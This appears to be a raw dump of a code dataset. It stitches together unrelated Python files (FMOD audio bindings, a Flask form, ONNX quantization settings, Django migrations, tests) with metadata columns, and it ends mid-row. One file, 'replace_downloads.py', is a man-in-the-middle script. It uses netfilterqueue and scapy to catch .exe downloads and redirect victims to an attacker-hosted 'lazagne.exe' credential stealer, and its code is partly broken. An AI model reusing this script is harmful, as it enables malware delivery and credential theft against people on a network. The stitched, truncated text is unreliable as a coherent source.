startunit = c_int()
end = c_uint()
endunit = c_int()
ckresult(_dll.FMOD_Sound_GetLoopPoints(self._ptr, byref(start), byref(startunit), byref(end), byref(endunit)))
return ((start.value, startunit.value), (end.value, endunit.value))
@loop_points.setter
def loop_points(self, p):
"""Same format as returned from this property is required to successfully call this setter."""
ckresult(_dll.FMOD_Sound_SetLoopPoints(self._ptr, p[0][0], p[0][1], p[1][0], p[1][1]))
@property
def mode(self):
mode = c_int()
ckresult(_dll.FMOD_Sound_GetMode(self._ptr, byref(mode)))
return mode.value
@mode.setter
def mode(self, m):
ckresult(_dll.FMOD_Sound_SetMode(self._ptr, m))
def get_music_channel_volume(self, channel):
v = c_float()
ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v)))
return v.value
def set_music_channel_volume(self, id, vol):
ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol)))
@property
def num_music_channels(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetMusicNumChannels(self._ptr, byref(num)))
return num.value
@property
def name(self):
name = create_string_buffer(256)
ckresult(_dll.FMOD_Sound_GetName(self._ptr, byref(name), 256))
return name.value
@property
def num_subsounds(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSubSounds(self._ptr, byref(num)))
return num.value
@property
def num_sync_points(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSyncPoints(self._ptr, byref(num)))
return num.value
@property
def num_tags(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumTags(self._ptr, byref(num)))
return num.value
@property
def open_state(self):
state = c_int()
percentbuffered = c_uint()
starving = c_bool()
diskbusy = c_bool()
ckresult(_dll.FMOD_Sound_GetOpenState(self._ptr, byref(state), byref(percentbuffered), byref(starving),
byref(diskbusy)))
return so(state=state.value, percent_buffered=percentbuffered.value, starving=starving.value,
disk_busy=diskbusy.value)
@property
def sound_group(self):
grp_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSoundGroup(self._ptr, byref(grp_ptr)))
return get_class("SoundGroup")(grp_ptr)
@sound_group.setter
def sound_group(self, group):
check_type(group, get_class("SoundGroup"))
ckresult(_dll.FMOD_Sound_SetSoundGroup(self._ptr, group._ptr))
def get_subsound(self, index):
sh_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr)))
return Sound(sh_ptr)
def get_sync_point(self, index):
sp = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp)))
return sp.value
def get_sync_point_info(self, point):
name = c_char_p()
offset = c_uint()
offsettype = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype)))
return so(name=name.value, offset=offset.value, offset_type=offsettype.value)
@property
def system_object(self):
sptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSystemObject(self._ptr, byref(sptr)))
return get_class("System")(sptr, False)
def play(self, paused=False):
return self.system_object.play_sound(self, paused)
def get_tag(self, index, name=None):
tag = TAG()
ckresult(_dll.FMOD_Sound_GetTag(self._ptr, name, index, byref(tag)))
return tag
@property
def _variations(self):
freq = c_float()
vol = c_float()
pan = c_float()
ckresult(_dll.FMOD_Sound_GetVariations(self._ptr, byref(freq), byref(vol), byref(pan)))
return [freq.value, vol.value, pan.value]
@_variations.setter
def _variations(self, vars):
ckresult(_dll.FMOD_Sound_SetVariations(self._ptr, c_float(vars[0]), c_float(vars[1]), c_float(vars[2])))
@property
def frequency_variation(self):
return self._variations[0]
@frequency_variation.setter
def frequency_variation(self, var):
v = self._variations
v[0] = var
self._variations = var
@property
def volume_variation(self):
return self._variations[1]
@volume_variation.setter
def volume_variation(self, var):
v = self._variations
v[1] = var
self._variations = var
@property
def pan_variation(self):
return self._variations[2]
@pan_variation.setter
def pan_variation(self, var):
v = self._variations
v[2] = var
self._variations = var
def lock(self, offset, length):
ptr1 = c_void_p()
len1 = c_uint()
ptr2 = c_void_p()
len2 = c_uint()
ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2)))
return ((ptr1, len1), (ptr2, len2))
def release(self):
ckresult(_dll.FMOD_Sound_Release(self._ptr))
def set_subsound(self, index, snd):
check_type(snd, Sound)
ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr))
def set_subsound_sentence(self, sounds):
a = c_int * len(sounds)
ptrs = [o._ptr for o in sounds]
ai = a(*ptrs)
ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai)))
def unlock(self, i1, i2):
"""I1 and I2 are tuples of form (ptr, len)."""
ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1]))
@property
def music_speed(self):
speed = c_float()
self._call_fmod("FMOD_Sound_GetMusicSpeed", byref(speed))
return speed.value
@music_speed.setter
def music_speed(self, speed):
self._call_fmod("FMOD_Sound_SetMusicSpeed", c_float(speed))
def read_data(self, length):
"""Read a fragment of the sound's decoded data.
:param length: The requested length.
:returns: The data and the actual length.
:rtype: Tuple of the form (data, actual)."""
buf = create_string_buffer(length)
actual = c_uint()
self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual))
return buf.value, actual.value
def seek_data(self, offset):
"""Seeks for data reading purposes.
:param offset: The offset to seek to in PCM samples.
:type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long."""
self._call_fmod("FMOD_Sound_SeekData", offset) | 31.745501 | 128 | 0.639809 | 1,617 | 12,349 | 4.611008 | 0.155844 | 0.054319 | 0.076449 | 0.101931 | 0.252548 | 0.195279 | 0.121647 | 0.078192 | 0.030848 | 0.020118 | 0 | 0.008162 | 0.246012 | 12,349 | 389 | 129 | 31.745501 | 0.792611 | 0.064297 | 0 | 0.206667 | 0 | 0 | 0.017398 | 0.011803 | 0 | 0 | 0 | 0 | 0 | 1 | 0.233333 | false | 0 | 0.013333 | 0.046667 | 0.386667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46725864f7a8f29464ea63af729e3e78c2a1218d | 370 | py | Python | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | """
Implement a class function for user to put in a zip-code and
search relevant information about business entities in that zip-code area.
"""
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
class inputZipForm(Form):
inputZip = StringField('inputZip', validators=[DataRequired()])
| 28.461538 | 78 | 0.77027 | 48 | 370 | 5.9375 | 0.6875 | 0.049123 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156757 | 370 | 12 | 79 | 30.833333 | 0.913462 | 0.364865 | 0 | 0 | 0 | 0 | 0.036697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
467742b9ee49da3193dfeffba9fb6976ebe7eb72 | 2,391 | py | Python | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 136 | 2020-06-01T14:03:31.000Z | 2020-10-28T06:10:50.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 133 | 2020-05-26T13:48:04.000Z | 2020-10-28T05:25:55.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 36 | 2020-05-28T08:18:39.000Z | 2020-10-27T14:46:58.000Z | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype
from nncf.common.graph.operator_metatypes import UnknownMetatype
DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = {
QuantizationTrait.INPUTS_QUANTIZABLE: [
ONNXConvolutionMetatype,
ONNXLinearMetatype,
ONNXAveragePoolMetatype,
ONNXGlobalAveragePoolMetatype,
ONNXAddLayerMetatype,
ONNXMulLayerMetatype,
ONNXBatchNormMetatype,
ONNXHardSigmoidMetatype,
ONNXResizeMetatype,
],
QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype,
ONNXSoftmaxMetatype,
UnknownMetatype],
QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype],
QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: []
}
| 49.8125 | 89 | 0.79632 | 261 | 2,391 | 7.199234 | 0.394636 | 0.059606 | 0.127728 | 0.153273 | 0.325705 | 0.325705 | 0.325705 | 0.325705 | 0.325705 | 0 | 0 | 0.003929 | 0.148473 | 2,391 | 47 | 90 | 50.87234 | 0.918959 | 0.233793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4375 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4677cd39827e65c98f0ade72fd58eb0f79b2c0cc | 671 | py | Python | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | 3 | 2019-08-02T21:02:47.000Z | 2021-09-08T13:59:43.000Z | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2019 all rights reserved
#
# declaration
class Chain:
"""
A locator that ties together two others in order to express that something in {next}
caused {this} to be recorded
"""
# meta methods
def __init__(self, this, next):
self.this = this
self.next = next
return
def __str__(self):
# if {next} is non-trivial, show the chain
if self.next: return "{0.this}, {0.next}".format(self)
# otherwise don't
return "{0.this}".format(self)
# implementation details
__slots__ = "this", "next"
# end of file
| 18.638889 | 88 | 0.593145 | 88 | 671 | 4.386364 | 0.647727 | 0.041451 | 0.056995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025052 | 0.28614 | 671 | 35 | 89 | 19.171429 | 0.780793 | 0.47541 | 0 | 0 | 0 | 0 | 0.105919 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46820f0e1937a8a50c1292d89054f263875a439f | 686 | py | Python | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | 1 | 2019-04-22T06:08:13.000Z | 2019-04-22T06:08:13.000Z | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
import nmrglue as ng
# read in the varian data
dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2")
# Set the parameters
u = ng.pipe.guess_udic(dic,data)
# create the converter object and initilize with varian data
C = ng.convert.converter()
C.from_pipe(dic,data,u)
# create pipe data and then write it out
ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True)
# check the conversion against NMRPipe
print "Conversion complete, listing differences between files:"
sdic,sdata = ng.sparky.read("2d_sparky.ucsf")
sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf")
print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
| 29.826087 | 67 | 0.759475 | 114 | 686 | 4.482456 | 0.526316 | 0.041096 | 0.054795 | 0.062622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01473 | 0.109329 | 686 | 22 | 68 | 31.181818 | 0.821604 | 0.291545 | 0 | 0 | 0 | 0 | 0.308333 | 0.135417 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46830865694c3242ec731476bef2c0bab11ffa36 | 420 | py | Python | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from rest_framework import status
from rest_framework.exceptions import APIException
class BadSource(APIException):
"""
Exception for when a lazily-loaded data source can't
be accessed for some reason
"""
status_code = status.HTTP_417_EXPECTATION_FAILED
default_code = 'bad_source'
def __init__(self, source: str, reason: str):
super().__init__(f"Bad source '{source}': {reason}")
| 28 | 60 | 0.719048 | 54 | 420 | 5.296296 | 0.666667 | 0.055944 | 0.118881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008824 | 0.190476 | 420 | 14 | 61 | 30 | 0.832353 | 0.190476 | 0 | 0 | 0 | 0 | 0.128125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4686dbf11ea2488f7a45d2ed0c1748432a5a0064 | 394 | py | Python | profiles/migrations/0018_auto_20180514_2106.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | 2 | 2018-12-03T09:19:31.000Z | 2020-02-11T15:32:12.000Z | {{cookiecutter.project_slug}}/profiles/migrations/0018_auto_20180514_2106.py | brentfraser/cookiecutter-geopaparazzi-server | f9cd705991879deac67365007e9589142afc09bf | [
"BSD-3-Clause"
] | 2 | 2019-02-20T17:50:55.000Z | 2019-02-21T15:19:51.000Z | profiles/migrations/0018_auto_20180514_2106.py | GeoAnalytic-code/geotabloid | af017d470ef4553d5fbd24d865cb22ca643fd999 | [
"MIT"
] | 2 | 2018-10-19T17:07:01.000Z | 2021-01-13T06:54:55.000Z | # Generated by Django 2.0.3 on 2018-05-14 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0017_otherfiles_location'),
]
operations = [
migrations.AlterField(
model_name='project',
name='url',
field=models.FileField(upload_to='projects/'),
),
]
| 20.736842 | 58 | 0.598985 | 41 | 394 | 5.658537 | 0.853659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067138 | 0.281726 | 394 | 18 | 59 | 21.888889 | 0.75265 | 0.114213 | 0 | 0 | 1 | 0 | 0.146974 | 0.069164 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4688b12d1b22b922d562bb53aed309b70230470c | 294 | py | Python | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-03-29 19:11
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('hitchhikeapp', '0010_userdata_userid'),
]
operations = [
migrations.DeleteModel(
name='Dog',
),
]
| 17.294118 | 49 | 0.602041 | 31 | 294 | 5.645161 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090476 | 0.285714 | 294 | 16 | 50 | 18.375 | 0.742857 | 0.153061 | 0 | 0 | 1 | 0 | 0.1417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4689fd0a503a48da1fc4fb1000e346ebf2f7be93 | 605 | py | Python | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 7 | 2020-05-07T08:13:44.000Z | 2021-12-17T07:33:51.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 17 | 2019-11-29T23:17:26.000Z | 2020-12-20T15:47:17.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 1 | 2020-12-17T22:44:21.000Z | 2020-12-17T22:44:21.000Z | from hypothesis import given
from tests.port_tests.hints import (PortedBoundingBox,
PortedPoint)
from tests.utils import equivalence
from . import strategies
@given(strategies.points)
def test_basic(point: PortedPoint) -> None:
assert isinstance(point.bounding_box, PortedBoundingBox)
@given(strategies.points, strategies.points)
def test_bijection(first_point: PortedPoint,
second_point: PortedPoint) -> None:
assert equivalence(first_point == second_point,
first_point.bounding_box == second_point.bounding_box)
| 31.842105 | 77 | 0.707438 | 64 | 605 | 6.5 | 0.390625 | 0.115385 | 0.115385 | 0.110577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219835 | 605 | 18 | 78 | 33.611111 | 0.881356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.153846 | false | 0 | 0.307692 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
468d721e5802a550fe36c1b0efccab7310faf51c | 697 | py | Python | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | from ._utils import construct_dia, construct_hth, construct_sampling_matrix
from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering
from .ess import ess, ess_sampling, recon_ess
from .fastgsss import fastgsss, recon_fastssss
from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs
__all__ = [
"ess",
"ess_sampling",
"bsgda",
"computing_sets",
"solving_set_covering",
"cheby_coeff4ideal_band_pass",
"estimate_lk",
"rsbs",
"fastgsss",
# reconstruction
"recon_fastssss",
"recon_bsgda",
"recon_ess",
"recon_rsbs",
# utils
"construct_sampling_matrix",
"construct_hth",
"construct_dia",
]
| 25.814815 | 76 | 0.71736 | 82 | 697 | 5.646341 | 0.329268 | 0.051836 | 0.090713 | 0.103672 | 0.146868 | 0.146868 | 0 | 0 | 0 | 0 | 0 | 0.003515 | 0.183644 | 697 | 26 | 77 | 26.807692 | 0.810193 | 0.028694 | 0 | 0 | 0 | 0 | 0.295252 | 0.077151 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.086957 | 0.217391 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4690da1c3b97e01a8795122d75752b424704a346 | 1,706 | py | Python | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
ack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will be using in line 22/29.
Do not forget to modify line 24 and 35 and uncomment them afterwards."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
# print("HTTP Request")
if ".exe" in scapy_packet[scapy.Raw].load and #Input IP of your web server here: "10.0.2.15" not in scapy_packet[scapy.Raw].load:
print("Captured .exe file in the Request packet.")
ack_list.append(scapy_packet[scapy.TCP].ack)
# print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport ==#CHOOSE PORT HERE: 80 / 10000:
# print("HTTP Response")
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("Replacing the file.")
# print(scapy_packet.show())
modified_packet = set_load(scapy_packet, #Input the full path of your executable here: "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n")
packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.086957 | 193 | 0.654162 | 246 | 1,706 | 4.439024 | 0.414634 | 0.120879 | 0.117216 | 0.086996 | 0.162088 | 0.100733 | 0.054945 | 0 | 0 | 0 | 0 | 0.032159 | 0.234467 | 1,706 | 45 | 194 | 37.911111 | 0.803982 | 0 | 0 | 0 | 0 | 0 | 0.058716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.076923 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469393ea6c4b1c5c7b78ca579da1a18fef848cb3 | 625 | py | Python | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | null | null | null | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T17:29:40.000Z | 2020-03-24T17:29:40.000Z | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T16:41:31.000Z | 2020-03-24T16:41:31.000Z | from ndebug import env_helpers
def test_inspect_ops(mocker):
mocker.patch.dict('os.environ', {'DEBUG_COLORS': 'no',
'DEBUG_DEPTH': '10',
'DEBUG_SHOW_HIDDEN': 'enabled',
'DEBUG_SOMETHING': 'null'})
actual = env_helpers.options()
assert actual == {'colors': False, 'depth': 10, 'show_hidden': True, 'something': None}
def test_load_and_save():
actual = env_helpers.load()
assert actual == ''
env_helpers.save('test:data')
actual = env_helpers.load()
assert actual == 'test:data'
| 31.25 | 91 | 0.5536 | 67 | 625 | 4.925373 | 0.507463 | 0.151515 | 0.193939 | 0.121212 | 0.193939 | 0.193939 | 0 | 0 | 0 | 0 | 0 | 0.009281 | 0.3104 | 625 | 19 | 92 | 32.894737 | 0.756381 | 0 | 0 | 0.142857 | 0 | 0 | 0.2064 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.142857 | false | 0 | 0.071429 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4694573c6edf0ff0ed4f4786ad3fb6ae431575db | 29,122 | py | Python | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | 1 | 2020-06-13T13:57:11.000Z | 2020-06-13T13:57:11.000Z | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
